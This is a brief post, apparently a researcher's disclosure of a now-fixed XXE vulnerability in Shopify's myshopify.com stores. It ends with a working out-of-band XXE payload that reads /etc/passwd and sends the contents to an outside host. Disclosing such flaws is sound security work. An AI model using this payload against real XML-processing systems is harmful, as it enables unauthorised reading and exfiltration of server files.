Shopify suffered from an XXE attack within their online stores domain - *.myshopify.com They were extremely quick in confirming and fixing the issue (even though it was a Sunday). Full details with the usual screen shots can be found at http://www.securatary.com <!ENTITY % payload SYSTEM "file:///etc/passwd"> <!ENTITY % param1 '<!ENTITY % external SYSTEM "http://www.securatary.com/x=%payload;">'> %param1; %external;